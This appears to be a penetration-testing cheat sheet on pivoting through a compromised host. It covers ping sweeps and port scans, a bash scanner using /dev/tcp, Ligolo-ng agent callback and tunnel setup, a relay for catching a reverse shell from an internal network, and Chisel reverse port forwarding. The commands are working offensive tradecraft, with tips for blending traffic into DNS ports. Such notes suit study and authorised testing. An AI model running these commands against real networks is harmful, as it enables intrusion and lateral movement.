# Pivoting and Port Forwarding

```
Pivoting is using a compromised host to reach networks that the attacker's machine cannot route to directly.
Port forwarding relays a single port through such a host, so a service that is otherwise unreachable (bound to localhost, or on an internal subnet) can be accessed remotely.
```

### Enumeration

```powershell
# Network info (ifconfig / route / arp on Linux; route print, netstat -r and arp -a on Windows)
ifconfig
route print
netstat -r
arp -a
# Only if nmap is available on the pivot host
nmap -sn 192.168.1.0/24

# Ping sweep for loop on hosts
# Linux
for i in {1..255}; do (ping -c 1 192.168.1.${i} | grep "bytes from" &); done

# Windows (cmd; -w 100 is a 100 ms timeout per host)
for /L %i in (1 1 254) do ping 172.16.5.%i -n 1 -w 100 | find "Reply"

# PowerShell
1..254 | % {"172.16.5.$($_): $(Test-Connection -count 1 -comp 172.16.5.$($_) -quiet)"}

# Ping sweep twice so the ARP cache gets built, then check arp -a for hosts that drop ICMP

# PowerShell port scan (replace IP with the target; Connect throws on closed ports and the error stream is discarded)
1..1024 | % {echo ((New-Object Net.Sockets.TcpClient).Connect("IP", $_)) "TCP port $_ is open"} 2>$null

```
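The one-liners above cover a pivot host that has nmap or PowerShell; a Linux pivot often has neither. The script below is an added example (not from the original page) that does the same host sweep and TCP connect scan with only bash, ping and coreutils' `timeout`, using bash's `/dev/tcp` pseudo-device for the connect. The subnet prefix `172.16.5` and the port list are illustrative assumptions; `port_open` also doubles as a quick check that a tunnel or forwarded port is actually reachable once one of the tools below is set up.

```bash
#!/usr/bin/env bash
# Added example: host and port sweep from a Linux pivot without nmap.
# Needs only bash (with /dev/tcp support), ping, seq and timeout.
set -u

# port_open HOST PORT [TIMEOUT_SECS] -> exit 0 if a TCP connect succeeds, non-zero otherwise.
# timeout bounds filtered ports that never answer; host/port are passed as arguments
# (not interpolated into the command string) so odd input cannot inject shell syntax.
port_open() {
    local host=$1 port=$2 secs=${3:-1}
    timeout "$secs" bash -c 'exec 3<>"/dev/tcp/$1/$2"' _ "$host" "$port" 2>/dev/null
}

# ping_sweep PREFIX -> prints live hosts in PREFIX.1-254 (e.g. ping_sweep 172.16.5).
# Hosts are probed in parallel; run it twice so the pivot's ARP cache is populated,
# then read arp -a for hosts that answer ARP but drop ICMP.
ping_sweep() {
    local prefix=$1 i
    for i in $(seq 1 254); do
        ( ping -c 1 -W 1 "$prefix.$i" >/dev/null 2>&1 && echo "$prefix.$i" ) &
    done
    wait
}

# port_scan HOST PORT... -> prints "HOST:PORT open" for each listening port in the list
port_scan() {
    local host=$1 p
    shift
    for p in "$@"; do
        if port_open "$host" "$p"; then
            echo "$host:$p open"
        fi
    done
}

# count_open HOST PORT... -> number of open ports among those listed (useful in scripted checks)
count_open() {
    port_scan "$@" | wc -l | tr -d ' '
}

# Usage: ./sweep.sh 172.16.5   (subnet prefix and port list are assumptions for illustration)
if [ $# -ge 1 ]; then
    for h in $(ping_sweep "$1"); do
        port_scan "$h" 21 22 80 135 139 443 445 3389 8080
    done
fi
```

`port_open 172.16.151.243 445` after the tunnel is up is a cheaper smoke test than a full `nxc` run, and `count_open` lets a wrapper script decide whether the tunnel is worth keeping before launching heavier tooling.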

### Ligolo-ng

{% embed url="https://github.com/nicocha30/ligolo-ng/releases" %}

```bash
# Setting up the tun interface on Kali (needs root; "user $(whoami)" lets the proxy run unprivileged afterwards)
ip tuntap add user $(whoami) mode tun ligolo && ip link set ligolo up

# Kali: proxy listening on TCP/53 with a self-signed cert (53 blends in with DNS; the default port is 11601)
./proxy -laddr 192.168.45.180:53 -selfcert

# Victim: agent calls back to the proxy; -ignore-cert is needed because of -selfcert
./agent.exe -connect 192.168.45.180:53 -ignore-cert

# Ligolo proxy console: select the agent session, then list its interfaces to find the internal subnet
session            # choose session 1
ifconfig           # shows e.g. 172.16.151.243/24, so the pivot subnet is 172.16.151.0/24

# On Kali (separate terminal, as root): route the pivot subnet into the tun interface
ip route add 172.16.151.0/24 dev ligolo
ip route list

# From the correct ligolo session, start the tunnel
# (ligolo-ng 0.6 and later renamed this to: tunnel_start --tun ligolo)
start

# Run a quick command just to verify that the tunnel is working
nxc smb 172.16.151.0/24

# Disable or delete the interface after use
ip link set ligolo down
ip tuntap del mode tun dev ligolo
```

### Catching a revshell from pivoted network

```sh
# Machine2 can't reach Kali directly, so have the agent on Machine1 listen and relay to Kali.
# In the ligolo console (Machine1's session): --addr is where the agent listens on Machine1,
# --to is where the proxy delivers the connection on Kali (0.0.0.0:80 means Kali's own port 80,
# so the same port number is used end to end and there is no confusion about which side is which).
listener_add --addr 0.0.0.0:80 --to 0.0.0.0:80 --tcp
# On Kali: catch the shell; Machine2's payload connects to Machine1's IP on port 80
rlwrap nc -lvnp 80

# Same trick to serve files into the pivoted network
listener_add --addr 0.0.0.0:443 --to 0.0.0.0:443 --tcp
python3 -m uploadserver 443
# Show the active listeners (remove them with listener_stop when done)
listener_list
```

### Ligolo-ng Local Port Forwarding

```bash
# https://github.com/nicocha30/ligolo-ng/wiki/Localhost
# Ligolo-ng maps the agent host's own loopback (127.0.0.1 on the machine running the agent) to 240.0.0.1,
# so services bound only to localhost on the pivot become reachable once a route exists.
ip route add 240.0.0.1/32 dev ligolo
# e.g. a MySQL instance that listens on 127.0.0.1:3306 on the pivot
mysql -h 240.0.0.1 -u apache -p -P 3306
```

### Ligolo-ng Multi Pivot

### Chisel

{% embed url="https://github.com/jpillora/chisel/releases" %}

```bash
# On the target: a service bound to loopback only, so it can't be reached from Kali directly
$ netstat -ano
tcp 0 0 127.0.0.1:8080 0.0.0.0:* LISTEN off (0.00/0/0)

# Install on Kali. The release .gz is the bare binary (gunzip it and chmod +x);
# the .deb from the same release page installs with dpkg.
# https://github.com/jpillora/chisel/releases/download/v1.10.1/chisel_1.10.1_linux_amd64.gz
dpkg -i chisel_1.10.1_linux_amd64.deb
apt-get install -f

# Kali: server on 1234; --reverse is required for clients to open R: (remote) forwards.
# Without --auth user:pass anyone who can reach 1234 can add forwards, so keep the port firewalled or use --auth.
./chisel_1.10.1_linux_amd64 server -p 1234 --reverse
2024/11/23 12:33:25 server: session#1: tun: proxy#R:8085=>8080: Listening

# Target (copy the same binary over first): Kali listens on 8085 and relays to the target's 127.0.0.1:8080
$ ./chisel_1.10.1_linux_amd64 client 192.168.45.206:1234 R:8085:127.0.0.1:8080
2024/11/23 17:33:27 client: Connecting to ws://192.168.45.206:1234
2024/11/23 17:33:27 client: Connected (Latency 44.970654ms)

# Browse to the target's internal service via the forwarded port on Kali
http://192.168.45.206:8085/login?from=%2F
```

### SSH

```
```
